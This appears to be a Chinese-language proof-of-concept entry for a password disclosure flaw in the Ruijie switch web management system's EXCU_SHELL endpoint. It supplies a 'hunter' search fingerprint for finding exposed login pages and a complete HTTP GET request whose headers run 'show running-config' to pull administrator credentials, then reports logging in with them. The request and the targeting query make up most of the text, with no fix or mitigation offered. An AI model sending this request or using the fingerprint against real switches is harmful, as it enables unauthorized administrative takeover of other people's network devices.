锐捷交换机WEB管理系统EXCU_SHELL密码信息泄漏漏洞
一、漏洞简介
锐捷交换机 WEB 管理系统 EXCU_SHELL存在密码信息泄露漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
二、影响版本
- 锐捷交换机 WEB 管理系统
三、资产测绘
- hunter
web.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif" - 登录页面
四、漏洞复现
GET /EXCU_SHELL HTTP/1.1
Cmdnum: 1
Command1: show running-config
Confirm1: n
User-Agent: Java/1.8.0_381
Host: xx.xx.xx.xx
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
使用获取的账号密码成功登录系统